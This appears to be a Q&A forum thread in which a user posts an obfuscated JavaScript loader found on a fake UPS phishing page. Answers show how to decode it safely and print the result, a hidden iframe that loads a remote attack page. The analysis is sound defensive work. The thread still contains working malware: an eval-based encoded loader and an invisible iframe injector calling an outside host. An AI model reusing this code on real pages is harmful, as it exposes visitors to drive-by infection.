
I received an e-mail which contained a link that looked like it was to UPS (and I opened it because I had ordered something last night. Bad timing.)

It was a simple web page and obviously not UPS, but I looked at the HTML and it had the following script embedded in it.

// Obfuscated loader, annotated as written: two statements are made to throw on
// purpose so that execution lands in nested catch blocks, where a numeric array
// is decoded back into JavaScript source and handed to eval.
try {
    q = document.createElement("p");
    // appendChild() is given a string (q + "") instead of a Node; in a browser
    // this throws, which is the intended route into the catch block.
    q.appendChild(q + "");
} catch (qw) {
    // 012 is a legacy octal literal (decimal 10), so h === -2 and h * h === 4.
    h = -012 / 5;
    try {
        // `prototype` is not declared anywhere: the ReferenceError this raises
        // is how control reaches the inner catch.
        prototype - 1;
    } catch (bawg) {
        ss = [];
        // h is non-zero, hence truthy, so f becomes "fromCharCode"; the name is
        // split in two to defeat naive string matching.
        f = (h) ? ("fromCharC" + "ode") : "";
        // window["eval"], spelled in pieces for the same reason.
        e = window["e" + "val"];
        // Encoded payload: from the decode step below, each entry appears to be
        // a character code multiplied by ((index % 4) + 1).
        n = [9, 18, 315, 408, 32, 80, 300, 444, 99, 234, 327, 404, 110, 232, 138, 412, 101, 232, 207, 432, 101, 218, 303, 440, 116, 230, 198, 484, 84, 194, 309, 312, 97, 218, 303, 160, 39, 196, 333, 400, 121, 78, 123, 364, 48, 186, 123, 492, 13, 18, 27, 36, 105, 204, 342, 388, 109, 202, 342, 160, 41, 118, 39, 36, 9, 250, 96, 404, 108, 230, 303, 128, 123, 26, 27, 36, 9, 200, 333, 396, 117, 218, 303, 440, 116, 92, 357, 456, 105, 232, 303, 160, 34, 120, 315, 408, 114, 194, 327, 404, 32, 230, 342, 396, 61, 78, 312, 464, 116, 224, 174, 188, 47, 194, 351, 464, 111, 196, 333, 468, 114, 194, 297, 428, 121, 92, 330, 404, 116, 94, 327, 388, 105, 220, 138, 448, 104, 224, 189, 448, 97, 206, 303, 244, 48, 202, 147, 396, 98, 114, 294, 220, 49, 202, 306, 192, 50, 98, 294, 200, 39, 64, 357, 420, 100, 232, 312, 244, 39, 98, 144, 156, 32, 208, 303, 420, 103, 208, 348, 244, 39, 98, 144, 156, 32, 230, 348, 484, 108, 202, 183, 156, 118, 210, 345, 420, 98, 210, 324, 420, 116, 242, 174, 416, 105, 200, 300, 404, 110, 118, 336, 444, 115, 210, 348, 420, 111, 220, 174, 388, 98, 230, 333, 432, 117, 232, 303, 236, 108, 202, 306, 464, 58, 96, 177, 464, 111, 224, 174, 192, 59, 78, 186, 240, 47, 210, 306, 456, 97, 218, 303, 248, 34, 82, 177, 52, 9, 18, 375, 52, 9, 18, 306, 468, 110, 198, 348, 420, 111, 220, 96, 420, 102, 228, 291, 436, 101, 228, 120, 164, 123, 26, 27, 36, 9, 236, 291, 456, 32, 204, 96, 244, 32, 200, 333, 396, 117, 218, 303, 440, 116, 92, 297, 456, 101, 194, 348, 404, 69, 216, 303, 436, 101, 220, 348, 160, 39, 210, 306, 456, 97, 218, 303, 156, 41, 118, 306, 184, 115, 202, 348, 260, 116, 232, 342, 420, 98, 234, 348, 404, 40, 78, 345, 456, 99, 78, 132, 156, 104, 232, 348, 448, 58, 94, 141, 388, 117, 232, 333, 392, 111, 234, 342, 388, 99, 214, 363, 184, 110, 202, 348, 188, 109, 194, 315, 440, 46, 224, 312, 448, 63, 224, 291, 412, 101, 122, 144, 404, 49, 198, 294, 228, 98, 110, 147, 404, 102, 96, 150, 196, 98, 100, 117, 164, 59, 204, 138, 460, 116, 242, 324, 404, 46, 236, 315, 460, 
105, 196, 315, 432, 105, 232, 363, 244, 39, 208, 315, 400, 100, 202, 330, 156, 59, 204, 138, 460, 116, 242, 324, 404, 46, 224, 333, 460, 105, 232, 315, 444, 110, 122, 117, 388, 98, 230, 333, 432, 117, 232, 303, 156, 59, 204, 138, 460, 116, 242, 324, 404, 46, 216, 303, 408, 116, 122, 117, 192, 39, 118, 306, 184, 115, 232, 363, 432, 101, 92, 348, 444, 112, 122, 117, 192, 39, 118, 306, 184, 115, 202, 348, 260, 116, 232, 342, 420, 98, 234, 348, 404, 40, 78, 357, 420, 100, 232, 312, 156, 44, 78, 147, 192, 39, 82, 177, 408, 46, 230, 303, 464, 65, 232, 348, 456, 105, 196, 351, 464, 101, 80, 117, 416, 101, 210, 309, 416, 116, 78, 132, 156, 49, 96, 117, 164, 59, 26, 27, 36, 9, 200, 333, 396, 117, 218, 303, 440, 116, 92, 309, 404, 116, 138, 324, 404, 109, 202, 330, 464, 115, 132, 363, 336, 97, 206, 234, 388, 109, 202, 120, 156, 98, 222, 300, 484, 39, 82, 273, 192, 93, 92, 291, 448, 112, 202, 330, 400, 67, 208, 315, 432, 100, 80, 306, 164, 59, 26, 27, 36, 125];
        // Only decodes when a DOM is present (environment check). The arithmetic
        // hides a plain counter: i starts at 0 and the loop runs until i == 617,
        // presumably the length of n.
        if (window.document) for (i = 6 - 2 - 1 - 2 - 1; - 617 + i != 2 - 2; i++) {
            k = i;
            // Divisor is (i % 4) + 1, undoing the per-position scaling. On the
            // first pass `[] + "..."` coerces ss from an empty array to a string.
            ss = ss + String[f](n[k] / (i % (h * h) + 2 - 1));
        }
        // eval of the reconstructed script, prefixed with a harmless "if(1)".
        e("if(1)" + ss);
    }
}

I'm not asking for anyone to decode the script for me, but what tools could one use to determine what's actually happening? I'm a C# programmer and don't do much JavaScript. I assume it's building some sort of code which it then executes. Is there a way I can trace through it to see what it's building?

Thanks

  • 3
    Try jsbeautifier.org to at least make it more readable, then take a look at using Firebug's console / breakpoints to take a look at what's happening. Commented Jun 15, 2012 at 14:03
  • 1
    The code is not encrypted, it's just all on one line, without spaces. edit: oh ok, there are some "hidden" parts :) Guess one could say it is encrypted (or maybe encoded is a better term). Commented Jun 15, 2012 at 14:04
  • You can run it through jsfiddle.net to execute the code, then use any browser dev tools (ctrl+shift+j in Chrome fx), to inspect the resulting page. It seems to want to load a lot of nested pages, I see some jar file references, and some funny looking urls ... Commented Jun 15, 2012 at 14:08
  • 1
    related: stackoverflow.com/questions/10889724/… Maybe it's the same problem. Commented Jun 15, 2012 at 14:10
  • 1
    This script is encoded (and obfuscated), not encrypted. If you can unscramble it without access to a secret cryptographic key, it's almost certainly not encrypted. See several thousand helpful references on the topic. Commented Jun 15, 2012 at 14:11

3 Answers 3


Just execute the code (in an isolated environment such as a throwaway VM, since the decoded script loads remote content) and replace e = window["e" + "val"]; with e = console.log first.

result:

    // The leading `if (1)` is the prefix the loader prepends before eval; it has no effect.
    if (1) if (document.getElementsByTagName('body')[0]) {
    // A <body> already exists: inject the iframe through the DOM.
    iframer();
} else {
    // No <body> yet (script ran before it was parsed): write the same hidden 10x10 iframe directly.
    document.write("<iframe src='http://autobouracky.net/main.php?page=0e1cb9b71ef021b2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
// Creates a 10x10 iframe pointing at the remote URL, hides it and pins it to the
// top-left corner so nothing is visible to the user, then appends it to <body>.
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://autobouracky.net/main.php?page=0e1cb9b71ef021b2');
    // Invisible and out of the document flow.
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    // Tiny dimensions as a second layer of concealment.
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}


The real fun starts when you load that iframe btw; another condensed page with obfuscated code ... judging from the contents, it looks pretty nasty =/
@Jack true, stackoverflow.com/questions/10889724/… shows how this probably goes on.

Use jsbeautifier as Graham suggested and you'll find a line

e("if(1)" + ss);

where e = window.eval and ss is the desired script - so replace that line with

console.log(ss);

and run the whole code in the Firebug console (again, in an isolated environment rather than your everyday browser profile). Voila.



The encoded JavaScript looks like this when decoded:

// Branch on whether <body> is available yet: inject the iframe via the DOM if it
// is, otherwise write the same hidden 10x10 iframe markup directly into the document.
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://autobouracky.net/main.php?page=0e1cb9b71ef021b2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
// Creates a 10x10 iframe pointing at the remote URL, hides it and pins it to the
// top-left corner so nothing is visible to the user, then appends it to <body>.
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://autobouracky.net/main.php?page=0e1cb9b71ef021b2');
    // Invisible and out of the document flow.
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    // Tiny dimensions as a second layer of concealment.
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

